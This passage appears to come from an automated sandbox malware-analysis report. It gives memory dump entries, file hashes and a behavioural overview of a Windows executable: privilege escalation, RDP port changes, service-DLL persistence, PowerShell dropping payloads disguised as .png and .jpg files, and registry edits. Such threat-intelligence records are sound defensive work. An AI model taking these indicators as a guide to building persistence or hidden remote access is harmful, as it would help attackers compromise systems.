memory/1216-83-0x0000000002032000-0x0000000002034000-memory.dmp

memory/1216-84-0x0000000002034000-0x0000000002037000-memory.dmp

memory/1216-85-0x000000001B930000-0x000000001BC2F000-memory.dmp

memory/1216-86-0x0000000002037000-0x0000000002038000-memory.dmp

memory/676-87-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 73d5f129d48545e17502109d3691aa24
SHA1 11bf4b4216bc3991fd555269bd468ed6926e5252
SHA256 713002baba1a677b7215f5a9496dccc4d766b4e5cfc52df84587e4b84729d026
SHA512 6e14ad082e93677c59bdcfaa80d77ac296ed7063a72aa23440c1712f24c202d02f80dfd9a5cc7979708a9306ed397247f25da782bc047920e621b9197ed45206

memory/676-90-0x000007FEEA7D0000-0x000007FEEB32D000-memory.dmp

memory/1216-91-0x000000000203C000-0x000000000205B000-memory.dmp

memory/676-93-0x0000000002912000-0x0000000002914000-memory.dmp

memory/676-94-0x0000000002914000-0x0000000002917000-memory.dmp

memory/676-95-0x0000000002917000-0x0000000002918000-memory.dmp

memory/676-92-0x0000000002910000-0x0000000002912000-memory.dmp

memory/676-96-0x000000001B840000-0x000000001BB3F000-memory.dmp

memory/1848-97-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 73d5f129d48545e17502109d3691aa24
SHA1 11bf4b4216bc3991fd555269bd468ed6926e5252
SHA256 713002baba1a677b7215f5a9496dccc4d766b4e5cfc52df84587e4b84729d026
SHA512 6e14ad082e93677c59bdcfaa80d77ac296ed7063a72aa23440c1712f24c202d02f80dfd9a5cc7979708a9306ed397247f25da782bc047920e621b9197ed45206

memory/676-100-0x000000000291C000-0x000000000293B000-memory.dmp

memory/1848-102-0x0000000002730000-0x0000000002732000-memory.dmp

memory/1848-103-0x0000000002732000-0x0000000002734000-memory.dmp

memory/1848-101-0x000007FEEA7D0000-0x000007FEEB32D000-memory.dmp

memory/1848-104-0x000000001B970000-0x000000001BC6F000-memory.dmp

memory/640-105-0x0000000000000000-mapping.dmp

C:\Windows\system32\rfxvmt.dll

MD5 dc39d23e4c0e681fad7a3e1342a2843c
SHA1 58fd7d50c2dca464a128f5e0435d6f0515e62073
SHA256 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA512 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

memory/1812-107-0x0000000000000000-mapping.dmp

memory/1488-108-0x0000000000000000-mapping.dmp

memory/432-109-0x0000000000000000-mapping.dmp

memory/1160-110-0x0000000000000000-mapping.dmp

memory/1280-111-0x0000000000000000-mapping.dmp

memory/1652-112-0x0000000000000000-mapping.dmp

memory/1064-113-0x0000000000000000-mapping.dmp

memory/1564-114-0x0000000000000000-mapping.dmp

memory/1204-115-0x0000000000000000-mapping.dmp

memory/1840-116-0x0000000000000000-mapping.dmp

memory/1868-117-0x0000000000000000-mapping.dmp

memory/1932-118-0x0000000000000000-mapping.dmp

memory/1084-119-0x0000000000000000-mapping.dmp

memory/472-120-0x0000000000000000-mapping.dmp

memory/672-121-0x0000000000000000-mapping.dmp

memory/1880-122-0x0000000000000000-mapping.dmp

memory/1860-123-0x0000000000000000-mapping.dmp

memory/316-124-0x0000000000000000-mapping.dmp

memory/916-125-0x0000000000000000-mapping.dmp

memory/968-126-0x0000000000000000-mapping.dmp

\Windows\Branding\mediasrv.png

MD5 07044622ac01aea214d75af177a9976f
SHA1 8647e016414d4ef1da52abcf889210f15c58a640
SHA256 e83dc368abf546e72a528509e3d2fd8e83153f783832abcef014cddb9da002e9
SHA512 21b30facf460b9c93d32e1a54d6e5e2578f49c782eb3325268f83ad9beb14dd2c06b9b8337161099a69c1ad082583fdf94d20c7c4e2c91063e6bc0e6c9664324

\Windows\Branding\mediasvc.png

MD5 7c2b6a91963747383e5cdb168539962c
SHA1 cd987c6f69702bf0369b4c49c898052fae21d513
SHA256 fc3c17833725d727590ef00fdf3f8d70f52d4c13a9cf52a77b6e74e22d7dae61
SHA512 8a952e2e7ac644cb73bc35f1d099f8c9590027f5e5f89771131025ce878c000fec1aeaf708113889e1044094ebbc311ee46f945cca6946860705edac4eec8141

memory/536-129-0x0000000000000000-mapping.dmp

memory/936-130-0x0000000000000000-mapping.dmp

memory/1160-131-0x0000000000000000-mapping.dmp

memory/1664-132-0x0000000000000000-mapping.dmp

memory/1564-133-0x0000000000000000-mapping.dmp

memory/1204-134-0x0000000000000000-mapping.dmp

\??\PIPE\lsarpc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

\??\PIPE\samr

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/984-137-0x0000000000000000-mapping.dmp

memory/1736-138-0x0000000000000000-mapping.dmp

memory/1932-139-0x0000000000000000-mapping.dmp

memory/1600-140-0x0000000000000000-mapping.dmp

\??\PIPE\samr

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/432-142-0x0000000000000000-mapping.dmp

memory/1092-143-0x0000000000000000-mapping.dmp

\??\PIPE\samr

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1840-145-0x0000000000000000-mapping.dmp

memory/1868-146-0x0000000000000000-mapping.dmp

memory/2024-147-0x0000000000000000-mapping.dmp

memory/1084-148-0x0000000000000000-mapping.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1084-151-0x000007FEEA7D0000-0x000007FEEB32D000-memory.dmp

memory/1564-152-0x0000000000000000-mapping.dmp

memory/1872-153-0x0000000000000000-mapping.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2021-09-23 11:03

Reported

2021-09-23 11:06

Platform

win10-en-20210920

Max time kernel

116s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f71c575754e1f5890ad8b35afd08b8be.exe"

Signatures

Grants admin privileges

Modifies RDP port number used by Windows

Sets DLL path for service in the registry

persistence

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_pj0fudg4.d3m.ps1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_w50vzthw.l3t.psm1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE586.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\ShellBrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE536.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\Basebrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE565.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE5B6.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE5C6.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = a63109125baed701 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\f71c575754e1f5890ad8b35afd08b8be.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
